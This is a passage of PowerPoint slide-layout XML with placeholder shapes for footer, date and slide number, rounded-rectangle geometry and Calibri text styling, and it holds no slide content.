          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{094D8093-5C98-1340-A410-BEB03B4EEDDC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46426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649F9F92-724B-F94F-8A77-51ACDC2CA118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBEDEEAE-8310-0246-A401-C9746648FE24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9ADF0003-F3A3-0747-A635-83129F60F80E}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116672F8-6CA9-5846-A73A-A8868519A159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{445F0039-5118-D64D-940B-4155F225BBE5}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132064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4" name="bk object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D74DEB35-2DAE-4D4F-9FF1-25D86AF41EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284163" y="465138"/>
            <a:ext cx="9234487" cy="36845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defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="714375"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="bk object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA38C75-10DE-E646-A7EB-8BDF0CECD1BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="3902075"/>
            <a:ext cx="4878388" cy="352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defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="714375"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="bk object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C14A1F-407B-C943-9A1B-A3E8BEE2C1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="382588" y="3922713"/>
            <a:ext cx="4799012" cy="271462"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6204584"/>
              <a:gd name="T1" fmla="*/ 1543 h 342264"/>
              <a:gd name="T2" fmla="*/ 0 w 6204584"/>
              <a:gd name="T3" fmla="*/ 544 h 342264"/>
              <a:gd name="T4" fmla="*/ 25 w 6204584"/>
              <a:gd name="T5" fmla="*/ 332 h 342264"/>
              <a:gd name="T6" fmla="*/ 91 w 6204584"/>
              <a:gd name="T7" fmla="*/ 159 h 342264"/>
              <a:gd name="T8" fmla="*/ 191 w 6204584"/>
              <a:gd name="T9" fmla="*/ 43 h 342264"/>
              <a:gd name="T10" fmla="*/ 313 w 6204584"/>
              <a:gd name="T11" fmla="*/ 0 h 342264"/>
              <a:gd name="T12" fmla="*/ 21481 w 6204584"/>
              <a:gd name="T13" fmla="*/ 0 h 342264"/>
              <a:gd name="T14" fmla="*/ 21604 w 6204584"/>
              <a:gd name="T15" fmla="*/ 43 h 342264"/>
              <a:gd name="T16" fmla="*/ 21703 w 6204584"/>
              <a:gd name="T17" fmla="*/ 159 h 342264"/>
              <a:gd name="T18" fmla="*/ 21771 w 6204584"/>
              <a:gd name="T19" fmla="*/ 332 h 342264"/>
              <a:gd name="T20" fmla="*/ 21795 w 6204584"/>
              <a:gd name="T21" fmla="*/ 544 h 342264"/>
              <a:gd name="T22" fmla="*/ 21795 w 6204584"/>
              <a:gd name="T23" fmla="*/ 1543 h 342264"/>
              <a:gd name="T24" fmla="*/ 21771 w 6204584"/>
              <a:gd name="T25" fmla="*/ 1754 h 342264"/>
              <a:gd name="T26" fmla="*/ 21703 w 6204584"/>
              <a:gd name="T27" fmla="*/ 1927 h 342264"/>
              <a:gd name="T28" fmla="*/ 21604 w 6204584"/>
              <a:gd name="T29" fmla="*/ 2044 h 342264"/>
              <a:gd name="T30" fmla="*/ 21481 w 6204584"/>
              <a:gd name="T31" fmla="*/ 2088 h 342264"/>
              <a:gd name="T32" fmla="*/ 313 w 6204584"/>
              <a:gd name="T33" fmla="*/ 2088 h 342264"/>
              <a:gd name="T34" fmla="*/ 191 w 6204584"/>
              <a:gd name="T35" fmla="*/ 2044 h 342264"/>
              <a:gd name="T36" fmla="*/ 91 w 6204584"/>
              <a:gd name="T37" fmla="*/ 1927 h 342264"/>
              <a:gd name="T38" fmla="*/ 25 w 6204584"/>
              <a:gd name="T39" fmla="*/ 1754 h 342264"/>
              <a:gd name="T40" fmla="*/ 0 w 6204584"/>
              <a:gd name="T41" fmla="*/ 1543 h 3422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04584" h="342264">
                <a:moveTo>
                  <a:pt x="0" y="252710"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115177" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149881" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6178224" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197335" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6204343" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6204343" y="252710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6197335" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6178224" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149881" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115177" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="252710"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25400">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bk object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255CEAA4-CFAA-1541-9050-D0A1ABA30EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="357188" y="2644775"/>
            <a:ext cx="2219325" cy="352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defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="714375">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" defTabSz="714375" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="714375"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sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="bk object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA879944-B3D1-A149-9D2B-2CF760CC5C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="396875" y="2663825"/>
            <a:ext cx="2139950" cy="273050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2767329"/>
              <a:gd name="T1" fmla="*/ 1754 h 342264"/>
              <a:gd name="T2" fmla="*/ 0 w 2767329"/>
              <a:gd name="T3" fmla="*/ 618 h 342264"/>
              <a:gd name="T4" fmla="*/ 25 w 2767329"/>
              <a:gd name="T5" fmla="*/ 378 h 342264"/>
              <a:gd name="T6" fmla="*/ 91 w 2767329"/>
              <a:gd name="T7" fmla="*/ 181 h 342264"/>
              <a:gd name="T8" fmla="*/ 190 w 2767329"/>
              <a:gd name="T9" fmla="*/ 49 h 342264"/>
              <a:gd name="T10" fmla="*/ 312 w 2767329"/>
              <a:gd name="T11" fmla="*/ 0 h 342264"/>
              <a:gd name="T12" fmla="*/ 9361 w 2767329"/>
              <a:gd name="T13" fmla="*/ 0 h 342264"/>
              <a:gd name="T14" fmla="*/ 9482 w 2767329"/>
              <a:gd name="T15" fmla="*/ 49 h 342264"/>
              <a:gd name="T16" fmla="*/ 9581 w 2767329"/>
              <a:gd name="T17" fmla="*/ 181 h 342264"/>
              <a:gd name="T18" fmla="*/ 9648 w 2767329"/>
              <a:gd name="T19" fmla="*/ 378 h 342264"/>
              <a:gd name="T20" fmla="*/ 9673 w 2767329"/>
              <a:gd name="T21" fmla="*/ 618 h 342264"/>
              <a:gd name="T22" fmla="*/ 9673 w 2767329"/>
              <a:gd name="T23" fmla="*/ 1754 h 342264"/>
              <a:gd name="T24" fmla="*/ 9648 w 2767329"/>
              <a:gd name="T25" fmla="*/ 1994 h 342264"/>
              <a:gd name="T26" fmla="*/ 9581 w 2767329"/>
              <a:gd name="T27" fmla="*/ 2191 h 342264"/>
              <a:gd name="T28" fmla="*/ 9482 w 2767329"/>
              <a:gd name="T29" fmla="*/ 2324 h 342264"/>
              <a:gd name="T30" fmla="*/ 9361 w 2767329"/>
              <a:gd name="T31" fmla="*/ 2373 h 342264"/>
              <a:gd name="T32" fmla="*/ 312 w 2767329"/>
              <a:gd name="T33" fmla="*/ 2373 h 342264"/>
              <a:gd name="T34" fmla="*/ 190 w 2767329"/>
              <a:gd name="T35" fmla="*/ 2324 h 342264"/>
              <a:gd name="T36" fmla="*/ 91 w 2767329"/>
              <a:gd name="T37" fmla="*/ 2191 h 342264"/>
              <a:gd name="T38" fmla="*/ 25 w 2767329"/>
              <a:gd name="T39" fmla="*/ 1994 h 342264"/>
              <a:gd name="T40" fmla="*/ 0 w 2767329"/>
              <a:gd name="T41" fmla="*/ 1754 h 3422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67329" h="342264">
                <a:moveTo>
                  <a:pt x="0" y="252710"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712434" y="7006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740772" y="26113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759879" y="54452"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766885" y="89156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2766885" y="252710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2759879" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2740772" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2712434" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2677731" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89156" y="341867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54452" y="334861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26113" y="315753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="287414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="252710"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="25399">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 name="Holder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712964" y="50602"/>
            <a:ext cx="2632472" cy="441467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="0" i="0" u="heavy">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="4352544"/>
            <a:ext cx="7040880" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E92E12C-AD4B-8B49-967C-D383B3361E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10992804-A3B2-1948-8D89-E6EBCD812B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="913596" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C70EA5DD-E73E-FE4D-B981-70061D6B0848}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
